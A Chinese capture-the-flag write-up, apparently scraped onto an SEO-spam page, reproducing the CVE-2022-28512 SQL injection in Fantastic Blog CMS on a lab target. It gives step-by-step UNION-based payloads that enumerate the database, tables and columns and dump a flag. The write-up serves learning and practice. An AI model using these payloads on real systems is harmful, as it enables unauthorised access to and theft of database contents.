当前位置: 首页 > news >正文

什么是企业网站营销宁波seo网络推广优化价格

什么是企业网站营销,宁波seo网络推广优化价格,嘉定做网站的,上海都市建筑设计有限公司文章目录 前言一、CVE-2022-28512靶场简述二、找注入点三、CVE-2022-28512漏洞复现1、判断注入点2、爆显位个数3、爆显位位置4 、爆数据库名5、爆数据库表名6、爆数据库列名7、爆数据库数据 总结 前言 此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。…

文章目录

  • 前言
  • 一、CVE-2022-28512靶场简述
  • 二、找注入点
  • 三、CVE-2022-28512漏洞复现
    • 1、判断注入点
    • 2、爆显位个数
    • 3、爆显位位置
    • 4 、爆数据库名
    • 5、爆数据库表名
    • 6、爆数据库列名
    • 7、爆数据库数据
  • 总结


前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!


一、CVE-2022-28512靶场简述

Sourcecodester Fantastic Blog CMS 1.0 中存在一个 SQL 注入漏洞。攻击者可以通过“id=5”参数在“/fantasticblog/single.php”中注入查询。
在这里插入图片描述

二、找注入点

Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。
我们就尝试找single.php的界面。
打开发现是有一个登录框,和一个登录注册。但是登录框是search.php,而且尝试sql注入也是无果。(如图所示)
在这里插入图片描述在这里插入图片描述
点开图片发现跳转到single.php界面,成功找到注入地方(如图所示)
在这里插入图片描述

三、CVE-2022-28512漏洞复现

  • 1、判断注入点
  • 2、爆显位个数
  • 3、爆显位位置
  • 4、爆数据库名
  • 5、爆数据库表名
  • 6、爆数据库列名
  • 7、爆数据库数据

1、判断注入点

(如图所示)这里我们老规矩抛出and 1=1 和 and 1=2测试。发现页面依旧正常,排除数字型。直接提交3’发现报错,报错信息为

You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use
near ‘‘3’’’ at line 1

在这里插入图片描述
通过报错信息可以知道是单引号闭合,这里构造的payload为

id=3'--+

2、爆显位个数

注入语句为

id=3' order by 9--+

发现为10的时候报错,那么显位个数是9了。
在这里插入图片描述

3、爆显位位置

注入语句为

id=-3' union select 1,2,3,4,5,6,7,8,9--+

发现有4可以注入,我就在4注入了
在这里插入图片描述

4 、爆数据库名

注入语句为

id=-3' union select 1,2,3,database(),5,6,7,8,9--+

在这里插入图片描述

得到数据库ctf

5、爆数据库表名

注入语句为

id=-3' union select 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables where table_schema=database()--+

在这里插入图片描述
得到数据库表名
titles,page_hits,membership_userpermissions,membership_groups,blog_categories,membership_userrecords,membership_users,editors_choice,blogs,links,flag,banner_posts,membership_grouppermissions,visitor_info
关键表名是flag

6、爆数据库列名

注入语句为

id=-3' union select 1,2,3,group_concat(column_name),5,6,7,8,9 from information_schema.columns where table_schema=database() and table_name="flag"--+

得到列名flag

在这里插入图片描述

7、爆数据库数据

注入语句为

id=-3' union select 1,2,3,group_concat(flag),5,6,7,8,9 from flag --+

在这里插入图片描述
得到flag
flag{6bf76a30-c821-429b-b2e7-03b6068cdf36}


总结

这一关的信息收集比较简单,一下子找到注入点了。这是一个简单的单引号闭合简单注入,极其简单。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!

http://www.wooajung.com/news/26241.html

相关文章:

  • 福州搜索优化网站百度sem代运营
  • 郑州网站推广怎么做网络广告四个特征
  • wordpress使用阿里云oss存储seo查询
  • asp网站上哪做东莞头条最新新闻
  • 如何免费做网站网页源云推广
  • 搜索引擎优化seo网站品牌营销推广要怎么做
  • 老网站删除做新站会影响收录吗做网站排名服务热线
  • 网站设计与开发专业百度关键词优化方法
  • 连锁店网站建设google搜索下载
  • 我想在购物网站做代理网站推广软件有哪些
  • 公司官网站怎么搞南平seo
  • 常州便宜的做网站服务百度手机助手最新版下载
  • 怎样做自己网站后台不被攻击全国各城市疫情搜索高峰进度
  • 网站ftp空间一个企业该如何进行网络营销
  • 阳泉推广型网站建设搜索关键词排名优化软件
  • 广州做韩国网站深圳aso优化
  • o2o电子商务网站十大教育培训机构排名
  • 广东疫情风险等级优化方法
  • dede网站qq类资源源码东莞网站建设推广平台
  • 内蒙古建设住房与城乡厅官方网站产品推广方式及推广计划
  • 做赌博的网站违不违法网站建设规划要点详解
  • 苏州外贸网站制作信息流优化师简历
  • 嘉兴外贸网站建设北京seo怎么优化
  • 点图片跳到网站怎么做网络推广培训
  • 手机网站建设教程b站推广入口2022
  • 集团网站建设网络公司网络服务器是指什么
  • 怎么才能搜索到自己做的网站免费关键词优化工具
  • 班级手机网站墨刀怎样做新闻摘抄2022最新5篇
  • 武义县建设局网站产品seo是什么意思
  • 网络兼职做网站泰安seo排名